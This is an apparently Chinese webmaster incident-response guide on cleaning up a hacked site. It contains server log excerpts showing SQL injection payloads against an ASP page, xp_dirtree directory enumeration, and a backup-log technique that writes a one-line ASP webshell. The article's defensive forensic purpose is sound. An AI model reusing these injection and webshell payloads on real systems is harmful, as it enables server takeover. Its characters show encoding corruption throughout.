當(dāng)前位置:首頁 >  站長 >  搜索優(yōu)化 >  正文

網(wǎng)站被黑怎么辦 解決辦法匯總

 2015-03-12 14:29  來源: 百度文庫   我來投稿 撤稿糾錯

  域名預(yù)訂/競價,好“米”不錯過

很多朋友都遇到過網(wǎng)站被黑,插入惡意代碼的經(jīng)歷??赡艽蠹乙詾橹灰堰@些代碼刪除了既可,但是,道高一尺,魔高一丈,如果只是簡單刪除代碼以后,絕大部分的朋友會再次遇到„„事實上,要很好地應(yīng)對網(wǎng)站入侵,老豬總結(jié)了幾個步驟如下,并根據(jù)以下幾個步驟寫了份案例附后,希望對大家有所幫助:

一、下載服務(wù)器日志,ftp傳輸日志。

當(dāng)發(fā)現(xiàn)網(wǎng)站被黑以后,首先要做的就是下載日志文件,包括服務(wù)器日志和ftp傳輸日志,服務(wù)器的日志位置一般是位于C:\WINDOWS \system32\Logfiles\W3SVC1。ftp日志則取決于你的服務(wù)器所安裝的ftp軟件,比如SERVE-U默認(rèn)是在安裝目錄下。但是,這邊提醒一點,既然你今天看到這篇文章,服務(wù)器的各種日志,一定要轉(zhuǎn)移出默認(rèn)的地方,同時設(shè)置一下刪除保護。對于虛擬主機用戶。一般你的空間提供商都會提供3天之內(nèi)的日志以及1個月的ftp日志下載,具體可以咨詢你的空間提供商。下載日志這點很重要。它是我們接下去找出漏洞的關(guān)鍵。

有條件的可以找專業(yè)的Sine安全小組解決網(wǎng)站被黑的問題。 本文來自

二、替換所有惡意代碼

進行下載日志的同時,應(yīng)該開始刪除惡意代碼,以免影響用戶體驗。如果你擁有服務(wù)器,推薦你使用老馬寫的findstr,把惡意插入的代碼批量替換掉。如果你使用虛擬主機,有部分虛擬主機提供批量替換功能。如果你的虛擬主機沒有提供這樣的功能(破爛貨,趕快換掉),那你可以去下載一個雷客圖ASP站長安全助手。來進行此項操作。這項操作要謹(jǐn)慎點,因為是對內(nèi)容直接進行替換,稍微一馬虎可能讓你的網(wǎng)頁內(nèi)容面目全非。

三、下載到本地殺毒,或者服務(wù)端殺毒

接下來,我們要開始找出入侵的幕后黑后了。記住,發(fā)現(xiàn)病毒先不要忙著刪除。如果你擁有個人服務(wù)器,可以開啟殺毒軟看看,如果是使用虛擬主機可以下載到本地,用殺毒軟件殺,或者用我剛才說的那個ASP站長安全助手。發(fā)現(xiàn)病毒以后,剛才說的,不要忙著殺掉。查看那個病毒文件的修改時間。這個步驟是最關(guān)鍵的。一般對方不會只留一個后門,可能會有漏網(wǎng)之魚。這時你可以搜索剛找到的那個病毒文件的修改時間,檢查這段時間建立或者修改了什么文件。那些文件都是嫌疑犯,統(tǒng)統(tǒng)記住他們的文件名,注意,這邊沒有讓你刪除,要先記住文件名!

這邊要提到一種情況,對方的木馬很隱秘,找不到,這個時候,你需要在所有的網(wǎng)頁文件中,查找一些木馬常用的詞,比如asp木馬,一般會有這些字符出現(xiàn)在木馬中,比如“木馬”,“免殺”,“w”,“shell”等等字符,有出現(xiàn)這些字符的,可能為對方留下的后門

四、同時,查找日志中的敏感詞,如“select”,“and%201=1”,獲得對方ip

獲得對方的木馬的文件名以后,這個時候要用到我們剛才的日志了來找到對方ip,看對方進行了什么操作。以某次反入侵經(jīng)歷例,通過查找特征字符,發(fā)現(xiàn)對方使用swz.asp這個木馬文件作為后門。于是在日志中搜索swz.asp,發(fā)現(xiàn)對方入侵的ip,當(dāng)然,如果你在上一個步驟沒有找到木馬,也可以通過查找““select”,“and%201=1”,這樣一些入侵的蛛絲馬跡,獲得對方ip為220.162.26.96

五、在日志中查找該ip,了解對方入侵的過程。

在這些日志中查找“220.162.26.96”這個字符串。發(fā)現(xiàn)以下一些記錄://后面為記錄

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[41425] 2007-07-12 03:52:40 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626 and exists (select * from sysobjects) -- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64

//123.asp出現(xiàn)漏洞,對方使用注入語句在獲得權(quán)限

[41492] 2007-07-12 03:52:56 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;DROP TABLE D99_Tmp;CREATE TABLE D99_Tmp(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) Insert D99_Tmp exec master..xp_dirtree "D:\", 1,1-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64

[41494] 2007-07-12 03:52:56 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626 And (Select char(124)+Cast(Count(1) as varchar(8000))+char(124) From D99_Tmp)=0 --|57|80040e07|將_varchar_值_‘|13|‘_轉(zhuǎn)換為數(shù)據(jù)類型為_int_的列時發(fā)生語法錯誤。 80 - 220.162.26.96 Internet+Explorer+6.0 500 0 0

[47001] 2007-07-12 04:23:06 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;DROP TABLE D99_Tmp;CREATE TABLE D99_Tmp(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) Insert D99_Tmp exec master..xp_dirtree "e:\wwwroot\", 1,1-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64

//利用了master..xp_dirtree

[47635] 2007-07-12 04:24:47 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;alter database mytable set RECOVERY FULL-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+KuGooSoft) 200 0 0

[47699] 2007-07-12 04:25:12 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;create table ahcmd (a image)-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+KuGooSoft) 200 0 0

[47754] 2007-07-12 04:25:25 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;backup log mytable to disk = ‘c:\ahcmd‘ with init-- 80 - 220.162.26.96

[47758] 2007-07-12 04:25:31 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;insert into ahcmd (a) s (‘<%execute request("")%>‘)-- 80 - 220.162.26.96

//插入一句話木馬

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

答案揭曉了,這是由于老豬之前的程序員所編寫的頁面123.asp傳入?yún)?shù)過濾不嚴(yán)格,導(dǎo)致了對方在服務(wù)器上為所欲為,同時,從日志上也可以看到,master..xp_dirtree這個存儲過程也起到了助紂為虐的作用。

七、彌補對方入侵漏洞。

接著,根據(jù)日志的提示,修改123.asp頁面,字符串參數(shù)過濾單引號,數(shù)字參數(shù)格式化為數(shù)字類型。在查詢分析器使用sp_dropextendedproc ‘xp_dirtree‘刪除掉它,同時刪除掉其他的一些危險的存儲過程。

八、修改ftp密碼,超級管理員密碼,3389登陸端口,用戶名,密碼。

接著就是善后了。對方如果已經(jīng)入侵了你的站點,這些密碼都不再是密碼,因此最保險的做法就是全部改掉。

九、將對方的ip,入侵時間,日志提交給當(dāng)?shù)鼐W(wǎng)警。Ping對方使用的僵尸網(wǎng)站,查詢對方網(wǎng)站所用ip,打電話到對方網(wǎng)站所在地的通信管理局投訴。

*教導(dǎo)我們,“宜將剩勇追窮寇,不可沽名學(xué)霸王”,本著除惡務(wù)盡的原則,一定要報案,這需要你保存對方入侵的日志,還有ip提供給警方。同時,如果對方插入了惡意代碼里面包含網(wǎng)址,例如www.abc.com 那恭喜你,整他的法子更多了,可以向信息產(chǎn)業(yè)部報案,可以ping這個站點,比如ping www.abc.com返回的ip為 222.222.222.222是位于廣東揭陽的,那你還可以打電話到廣東揭陽的通信管理局投訴。這個時候,就是你盡情發(fā)泄的時候了

申請創(chuàng)業(yè)報道,分享創(chuàng)業(yè)好點子。點擊此處,共同探討創(chuàng)業(yè)新機遇!

相關(guān)標(biāo)簽
網(wǎng)站被黑解決方法

相關(guān)文章

  • 網(wǎng)站收到信息系統(tǒng)安全等級保護限期整改通知書解決辦法

    2018年6月,我們接到一位來自北京的新客戶反映,說是他們單位收到一封來自北京市公安局海淀分局網(wǎng)安大隊的通知書,通知稱:貴單位網(wǎng)站存在網(wǎng)絡(luò)安全漏洞,網(wǎng)站被植入后門程序,要求你單位要在XX日之前,對網(wǎng)站進行安全整改,并要求提供完整的整改方案。

  • 這些網(wǎng)站被黑后的解決方案相信可以幫助到站長

    此貼提供幾種方法(僅適合MetInfo3.0),以便網(wǎng)站已經(jīng)被黑的用戶能將自己的網(wǎng)站恢復(fù)如初。(不能夠熟練操作FTP和網(wǎng)站后臺的商業(yè)用戶,可以到商業(yè)技術(shù)支持區(qū)開新帖求助,會有專門的技術(shù)為您處理!)首先教大家?guī)追N辨別網(wǎng)站是否被掛木馬的方法:1、查看網(wǎng)站頁面源碼(在網(wǎng)頁中右鍵‘查看源文件’),是否存在與

  • 被黑網(wǎng)站報告分析與診斷

    被黑網(wǎng)站報告分析與診斷問題網(wǎng)站一:1、被黑目標(biāo)網(wǎng)站:www.xxx.com2、網(wǎng)站目前所有者:何雪峰3、被黑時間:2012年12月13日4、被黑后網(wǎng)站出現(xiàn)的異常情況:站內(nèi)被添加很多垃圾的友情鏈接。5、被黑原因:通過程序漏洞木馬侵入,網(wǎng)站后臺,賬號密碼被破解,被掛入大量外鏈。問題網(wǎng)站二:1、被黑目標(biāo)網(wǎng)

  • 網(wǎng)站被黑以后如何恢復(fù)正常?

    網(wǎng)站的安全問題,讓好多站長朋友們都非常的焦慮。相信不少的朋友都碰到過,網(wǎng)站被人入侵了掛了黑鏈接或者非法網(wǎng)站內(nèi)容。百度收錄了大量的垃圾頁面內(nèi)容。導(dǎo)致網(wǎng)站權(quán)重排名急劇下降了;碰到這個問題時,不要慌張了。下面麥麥就結(jié)合自己網(wǎng)站被入侵后情況現(xiàn)身說法;網(wǎng)站被非法入侵后,做哪些事情能恢復(fù)正常了?1.檢測網(wǎng)站是否

熱門排行

信息推薦